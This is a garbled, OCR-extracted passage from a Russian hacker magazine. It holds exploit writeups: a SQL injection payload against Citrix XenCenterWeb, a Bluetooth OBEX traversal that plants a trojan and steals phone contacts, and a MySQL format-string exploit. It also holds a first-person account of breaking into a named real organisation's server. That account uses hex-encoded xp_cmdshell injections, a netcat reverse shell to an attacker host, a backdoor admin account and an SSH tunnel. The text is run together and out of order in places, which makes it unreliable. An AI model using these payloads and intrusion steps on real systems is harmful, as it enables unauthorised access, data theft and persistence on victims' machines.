книги хакеры / журнал хакер / 129_Optimized

пользуя временные параметры: https://xencenterweb.loc/login.php?username=user' UNION SELECT if(user() LIKE

'root@%', benchmark(1000000,sha1('test')),'false')/*

TARGETS Citrix XenCenterWeb.

SOLUTIONS Сitrix никакнеотреагироваланастольсущественныеуязвимости.

04АТАКАНАWINDOWS

MOBILEOBJECTEXCHANGE(OBEX)/

СМАРТФОНЫHTC

BRIEF: Старо, какмир! Bluetooth-сервисизвестноймаркисмартфонов икоммуникаторовуязвим, причемсамойбагеужеоколо10 лет. Всвое времячерезOBEX распространялисьпервыемобильныечервяки. OBEX FTP Bluetooth service используетсядля«обмена» файламичерезбеспроводнойканал. «Обмен» следуетвосприниматьнетолькокакотдачу конкретноголокальногофайластороннемуклиенту, ноикаквозможности удаленномуклиентуизучатьсодержимое«шары» твоегомобильника. Опасностьзаключаетсявтом, чтоприкаких-либоусловияхзлоумыш- ленникуудастсяобойтиограничения, подняться«выше» покаталогами попасть, скажем, вразделавтозагрузки, кудаипоместитьвредоносный код. Другаябеда— злоумышленникможетпросто-напростопохитить ценныедлятебяданныетелефоннойкниги, сообщений, личныезаписи планировщикаимногоедругое.

EXPLOIT Производитьтакогородаатакиможносиспользованием ноутбука. ДляэтогонанемобязательнодолжнаприсутствоватьподдержкастекаBluetooth (однаизреализаций, кпримеру, длябиблиотеки, о

которойпойдетречьдальше, — этоMicrosoft Bluetooth Stack / Widcomm Bluetooth Stack), ивозможностьустановкидополнительныхбиблиотек, выступающихвкачествеинтерфейса. Самаяраспространеннаядляэтих задачлиба— BlueZ (bluez.org/download) скучейвариацийнапочтивсех современныхязыкахпрограммированиявысокогоуровня(pyBlueZ — естьWindows-модуль, perl дляэтогоимеетмодульNet:Bluetooth).

ДляустановкиBlueZ наWindows потребуетсяMicrosoft Service Pack 2/3

иMicrosoft Platform SDK. Конечно, тыможешьиспользоватьабсолют-

носторонниевещи, вродеEthermind Bluetooth Stack, Toshiba Stack, BlueSoleil. Они, кстати, поддерживают DUN, FAX, HFP, HSP,

LAP, OBEX, OPP, PAN SPP, AV, BIP, FTP, GAP, HID, SDAP, но тебе придется ковыряться в их же SDK, которые поставляются когда бесплатно, а когда и по запросу от производителя. Причем при «заказе» потребуется доказать, что ты являешься независимым разработчиком и намека на заработок в твоих исследованиях совсем не видно.

Ноэтовселирика. Изначальнотакповелось, чтоBlueZ — реализациястекаBluetooth дляLinux, ееофициальновключиливпакет Linux Kernel. Внастоящеевремяонаподдерживаетабсолютновсе протоколыBluetooth. Вдобавок, впакетахксистемеможновстретить bluez-utils/bluez-firmware — содержатпаруутилит, которыепомогут тебепочувствоватьсебяснейболеесвободно. Дляначалаустанови самуBluez, азатемObexFTP (triq.net/obexftp):

root@skvz:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l Организация листинга файлов с удаленного телефона из его «шары»

MAC-адрес устройства можно обнаружить с помощью hcitool -scan

Browsing 00:17:83:02:BA:3C ...

Channel: 4 Connecting...done

Receiving "(null)"... <?xml version="1.0"?> <!DOCTYPE folder-listing SYSTEM "obex-folder-listing. dtd">

<folder-listing version="1.0"> <parent-folder name=»» />

<file name=»fotaca.jpg" created="20090119T173932Z" size=»134680"/>

<file name=»nota.pwi" created=»20090119T175242Z" size=»432"/>

</folder-listing> done Disconnecting...done

root@skvz:~/bluez$ obexftp -b 00:17:83:02:BA:3C -c "..\\..\\Windows\\Startup\\" -p trojan.exe Закидываем файл с вредоносным содержимым в автозапуск Browsing 00:17:83:02:BA:3C ...

Channel: 4

РаскрытиемкритическиважнойинформациичерезсервисOBEX грешнынетолькотелефоныHTC

Connecting...done

Sending "..\..\Windows\Inicio\"... done Sending "trojan.exe"...\done Disconnecting...done root@skvz:~/bluez$

Trojan.exe выполнитсяприпоследующемрестартедевайса. Каквидишь, такимспособомможноосуществить«bluesnarfing» наслабозащищенный профильOBEX (Object Exchange Push Profile). Соответственно, тыпонима-

ешь, HTC неединственный, которыйтакможноатаковать. Этораспространеннаяпроблемамногихтелефонов.

Примеризжизни:

Открываем ноутбук, ставим obexftp, в качестве ОС — Linux root@skvz: emerge -s obexftp

Searching...

[ Results for search key : obexftp ] [ Applications found : 1 ]

* net-wireless/obexftp

Latest version available: 0.10.6 Latest version installed: 0.10.6 Size of downloaded files: 368 kB Homepage: http://triq.net/obex

Description: File transfer over OBEX for mobile phones License: GPL-2

root@skvz: emerge net-wireless/obexftp Производим сканирование устройств root@skvz: hcitool scan

Scanning ...

00:0A:D9:5A:9C:22 Packetwerks Phone Запрашиваем с телефона данные Vcard из PhoneBook root@skvz: obexftp -b 00:0A:D9:5A:9C:22 -B 10 -g

telecom/pb.vcf

Browsing 00:0A:D9:5A:9C:22 ...

Channel: 7

No custom transport Connecting...bt: 1 done

Receiving telecom/pb.vcf.../done Disconnecting...done

# читаем данные root@skvz: more pb.vcf BEGIN:VCARD VERSION:2.1 N:Smith;Aaron

EMAIL;INTERNET;PREF:user@host.com

TEL;CELL:2135551212

END:VCARD

BEGIN:VCARD

VERSION:2.1

N:;Abby [...]

VCard содержит сведения о контактах в виде визитной карточки (именно эти файлы ты кидаешь другу, когда хочешь передать ему контакт из своей адресной книжки мобильника).

TARGETSПродуктыHTC набазеWindows Mobile 6 / 6.1, пятаяветка— не уязвима.

SOLUTIONРешение— отключатьBluetooth ивключатьеготолькотогда, когдаэтонеобходимо. Этимтыизбавишьсебяотнезаметногохищения данныхстелефона.

05ФОРМАТНОЙ СТРОКИВMYSQL

BRIEF:Багаобнаруженавibmysqld/sql_parse.cc. Замечу, чтоименно этотфрагменткодафигурируетвовсехверсияхMySQL до6. Обращения кфункцииmysql_log.write() безспецификаторовиливдругихподобных ситуациях(когдаспефицикаторовбольше, чемформируемыхпеременных, например) приводяткотказувобслуживании.

>>EXPLOIT Нижепривожуфрагментубийственногоэксплойта:

#include <stdlib.h> #include <stdio.h> #define USE_OLD_FUNCTIONS #include <mysql/mysql.h> #define NullS (char *) 0

int main (int argc, char **argv)

{

MYSQL *mysql = NULL;

mysql = mysql_init (mysql); if (!mysql)

{

puts ("Init faild, out of memory?"); return EXIT_FAILURE;

}

if (!mysql_real_connect (mysql, /* MYSQL structure to use */

"localhost", /* server hostname or IP address */ "monty", /* mysql user */

"montypython", /* password */

NULL, /* default database to use, NULL for none */

0, /* port number, 0 for default */

NULL, /* socket file or named pipe name */ CLIENT_FOUND_ROWS /* connection flags */ ))

{

puts ("Connect failed\n");

}

else

{

puts ("Connect OK\n");

// mysql_create_db(mysql, "%s%s%s%s%s"); simple_command(mysql, COM_CREATE_DB, argv[1], strlen(argv[1]), 0);

}

mysql_close (mysql); return EXIT_SUCCESS;

}

Эксплойтзапускаемтак(тольковэкспериментальныхцелях):

$gcc mysql_format.c -o mysql_format -lmysqlclient $./mysql_format %s%s%s%s%s

TARGETS MySQL <= 5.0.45.

SOLUTIONВ данный момент решения, предложенного производителем, не наблюдается. Уязвимость имеет место исключительно на пост-авторизационном уровне, поэтому главное, от чего потребуется обезопаситься — это от неправомерного доступа в твою базу данных. z

кавычкияувиделошибкунапреобразованиетиповданных, а ужечетвертаяисследованнаяссылкаоткрылавовсейкрасе эксплойтабельнуюинъекциюсвыводомошибокирезультатов запросов.

Безалаберностьихалатность, скоторойведетсяпроектиро- ваниеиразработкаинтернет-ресурсовмногихфинансовых организаций, заставляетзадуматьсяокачествеихработыв целом. Предлагаювсювинузафинансовыйкризисвозложить нанепрофессионализмамериканскихбуржуевиперейтик показательнойкарательнойоперациинапримереNAFCU.

ШАГ1.РАЗВЕДКАМЕСТНОСТИ

Поадресуnafcu.org/Template.cfm?Section=What_is_an_ FCU_&Template=/ContentManagement/HTMLDisplay. cfm&ContentID=3842мыимеемклассическуюинъекцию SQL-запросов. Приподстановкекавычкиполучимневероятно информативныйвыводошибкиColdFusion, вкоторыйтранс-

лируетсяошибкаSQL — [Microsoft][ODBC SQL Server Driver] [SQL Server]Line 4: Incorrect syntax near.Очевидно, чтодело придетсяиметьсSQL-серверомотмелкомягких.

Разведкуначнемпроводитьвнаправленииопределения параметровБДисамогосервера. Дляэтогопрощупаемскрипт запросомвида

nafcu.org/Template.cfm?Section=What_is_an_ FCU_&Template=/ContentManagement/HTMLDisplay. cfm&ContentID=38427+and+1=0+or+1=(select+char( 108)%2bcast(0x746869736973736570617261746F72+a s+varchar(200))%2bcast(replace(@@version,char( 10),char(32))+as+varchar(200))%2bcast(0x746869 736973736570617261746F72+as+varchar(200))%2bca st(db_name()+as+varchar(200))%2bcast(0x7468697 36973736570617261746F72+as+varchar(200))%2bcas t(system_user+as+varchar(200))%2bcast(0x746869 736973736570617261746F72+as+varchar(200))%2bca st(@@servername+as+varchar(200))%2bcast(0x746 869736973736570617261746F72+as+varchar(200))%2 bchar(108))--.

Всесложилосьнаредкостьудачно— сработалаошибкана преобразованиетипов, иврезультатеполученаидентификационнаяинформация:

•сервер — Microsoft SQL Server 2000 — 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4);

•пользователь — sa.

Пользовательsa! Ну, нифигасебе. Водномизизи-хаковяпи- салопроцедуреxp_cmdshell (вернее, оспособеееактивации вSQL Server 2005), котораяпредоставляетвозможностьрабо- тысОСотимениучеткиSQL-сервера(вбольшинствеслучаев

— system). Тамжеяписал, чтоприложения, работающиеотsa, нетакужиредки. Неповерилтогда— убедисьсейчас:). Послетого, какбылополученоимяучетки, всемоевнимание сосредоточилосьвокругпроцедурыxp_cmdshell.

ШАГ2.ПОДГОТОВИТЕЛЬНЫЕ ДЕЙСТВИЯ

Возвращаяськизи-хаку, напомню, чтопроцедураxp_cmdshell в2005 серверепоумолчаниюотключена, ноееможно включить, имеяпривилегииsysadmin. Дляэтогонужнолишь воспользоватьсяпроцедуройsp_configure. Мыжеработаем ссервером2000, вкоторомэтогофункционаланет. Однако

длячегоядержалвлисеотдельнуювкладкус заряженнойинъекцией:

and+1=0+or+1=(select+char(108)%2bc

ast(0x746869736973736570617261746F

72+as+varchar(200))%2bcast(count(*

)+as+varchar(200))%2bcast(0x746869

736973736570617261746F72+as+varcha r(200))%2bchar(108)+from+foo)--.

ШАГ4.ОБЕСПЕЧИВАЕМ СКРЫТНОСТЬ

Веселооткрывочереднуюбанкукефира, я инъектировалкод:

;insert into foo execute master.. xp_cmdshell 'ipconfig'--

–иобломался. Всеправильно, язабылпро WAF, которыйнужнокак-тообойти. Япопыталсязаменитьвсестрокинаихшестнадцатеричныепредставления, ноиззатеиничего неполучилось. Неполучилось, потомучто строкаmaster..xp_cmdshell здесьвыступалане

вкачествепараметра, авкачественазвания функции. «Воттебеитри», — отвечалWAF на всемоиизвращенныепопытки.

Яполезвдокументациюивскореувидел, что execute можетприниматьназваниефункции

ввидестрокитипаnvarchar. Приподстановке жешестнадцатеричногозначенияяпередавал varchar. Сервер, тихопосмеиваясь, счестным видомвыдавалстраницыбезвсякогонамека наошибки. Дляреализациизадуманногоследовалоконвертитьстроку master..xp_cmdshell

вnvarchar передпередачейеенаисполнение. Посленедолгихмыканийродилсяследующий шаблон:

;declare @v as varchar(2048) declare @n as nvarchar(2048) set @v = 0x6d61737465722e2e78705f636d647368 656c6c set @n = cast(@v as nvarchar) set @v = <command_in_hex> insert into foo execute @n @v--,

ãäå 0x6d61737465722e2e78705f636d647

ФИЛЬТРАЦИЯВДЕЙСТВИИ

203e3e202554454d50255c5c746573745c 5c746573742e747874202626206563686f2

0555345522069736d2e77732e70726f642 e636f6465206a61576c55586b615a4e4e5 746757a4662203e3e202554454d50255c5 c746573745c5c746573742e74787420262 6206563686f2062696e617279203e3e202 554454d50255c5c746573745c5c7465737 42e747874202626206563686f206765742 0746f6f6c735c5c6e632e6578652025544 54d50255c5c746573745c5c6e632e65786 5203e3e202554454d50255c5c746573745 c5c746573742e747874202626206563686 f2071756974203e3e202554454d50255c5 c746573745c5c746573742e74787420262 6206674702e657865202d69202d6e202d7 6202d733a2554454d50255c5c746573745 c5c746573742e747874 insert into foo execute @n @v--.

Дляпроверкивыполняемdir %temp%\test:

; declare @v as varchar(2048) declare @n as nvarchar(2048) set @v = 0x6d61737465722e2e78705f636d647368 656c6c set @n = cast(@v as nvarchar) set @v = 0x6970636f6e666967 insert into foo execute @n @v--.

ВсеОК, nc.exe наместе. Точнотакжезаливаем plink.exe (можнобылоиводинскриптзасунуть), толькодиректориюсоздаватьужененадо.

ШАГ7.ЗАКРЕПЛЕНИЕ

Далеенужнозапуститьтакиекоманды,какnet userиnetlocalgroup.Можновседелатьчерез инъекцию,ноприналичииnetcatэтоуженеимеет смысла.Поэтомунадедикеязапустилnc.exeв режимепрослушиванияпорта1234:

nc.exe -l -p 1234.

Дляреверсконнектакдедуипробросашелла следоваловыполнитькоманду:

%temp%\test\nc.exe m0r0.ded.com 1234 -e cmd

– состоронысервака. Послекодирования имеемследующийинъект:

; declare @v as varchar(2048)

declare @n as nvarchar(2048) set @v = 0x6d61737465722e 2e78705f636d647368656c6c set @n = cast(@v as nvarchar) set @v = 0x2574656d70255c5c746573745c5c6e632e657865206 d3072302e6465642e636f6d2031323334202d6520636d64 insert into foo execute @n @v-

Всепрошлокакнельзягладко, ивконсолидедаяувиделшеллподопытногосервера. Воспользовавшиськонсолью, яактивировалюзера support_388945a0 идобавилеговгруппуадминистраторов:

net user support_388945a0 /active:yes m0r0pass

net localgroup administrators support_388945a0 /add.

ШАГ8.АТАКА

Глотнувещекефира, язапустилнадедеSSH-сервер. Наавтоматевконсоли появиласькомандадляподключенияпоSSH. Классикапроникновения:

ПОИСКИНЪЕКЦИЙ

Простейшийспособопределенияуязвимыхпараметровзаключаетсявподстановкекавычеквпередаваемыезначения. Собственно, такимобразомибылиобнаруженыуязвимостиNAFCU. Нестоитзацикливатьсяисключительнонакавычках. Во-первых, ошибкимогутпростоневыводиться. Вэтомслучаеприподстановкекавычкитытупоничегонеувидишь. Во-вторых, кавычки могутэкранироваться. Ошибкиникакойнепроизойдет, аинъекция, темнеменее, можетприсутствовать. Так, например, при переполнениицелочисленныхпараметровкавычкиивовсене нужны. Наконец, параметрможетбытьуязвимкслепыминъекциям. Подставлятькавычкуздесь— этокакядернойбоеголовкойпо муравейнику. Поэтомупомимокавычекяповсеместноиспользую конструкции«and 1=1--» и«and 1=0--», добавляяихкосновному значениюпараметравразличныхвариациях. Стопроцентной гарантиинет, новбольшинствеслучаевприналичииинъекции сервербудетвозвращатьразныерезультаты. Главноеубедиться, чтоосновноезначениепараметраобеспечиваетвозвраткакихнибудьданных. Отличиеврезультатахтыможешьувидетьнаглаз. Номожешьинеувидеть, еслиононезначительноилиневыводитсябраузером. ВлюбомслучаестоитзаглядыватьвHTM-коды страницисравниватьихмеждусобой. Вручнуюделатьэтокрайне неэффективно, поэтомусоветуюзадуматьсяоразработкесредств автоматизации.

%temp%\test\plink.exe -nc m0r0.ded.com:22 -batch -pw <pass>-R 3390:127.0.0.1:3389 -L 3390:127.0.0.1:3390 -l <username> -auto_store_key_in_cache m0r0.ded.com

Сервак в наших руках, — можно подключаться на 127.0.0.1:3990. После ввода логина и пароля я оказался на территории врага. СУБД работала в режиме Windows Authentication, так что получить доступ ко всем БД и слить дампы не составляло труда. Развитие успеха я оставлю за кадром, предлагая включить фантазию.

ТЯЖЕЛОВУЧЕНИИ

Окучивая NAFCU, я столкнулся со многими, казалось, непреодолимыми трудностями. Это и активация xp_cmdshell, и обход WAF, и заливка файлов, и, конечно, уже классический обход файра с помощью реверс-коннекта по SSH. Однако суть не в этом. Прелесть в том, что это не уникальный баг, а типовая ситуация, и все вышеописанное следует расценивать как методику. Имея в рукаве такие козыри, как инъекция и доступ с правами sa, ты можешь не бояться за исход партии, главное — умело ими воспользоваться. Все описанные действия были совершены под музыку Бетховена. Слушай классику и будь счастлив.z

Совет№2. Развдвачаса

отрывайсяотработы иустраивайтепрогулку!

Есливозможно,гуляйпо5-10 минутнаулице.Номожешь ходитьивофисе.Ачтобывсе думалинето,чтотыбездельничаешь(ониведьнезнаютпро «КалендарьЗдоровья»!),ачтоу тебяважныеделапоработе— возьмиврукистопкуисписанныхбумаг.Этоработает!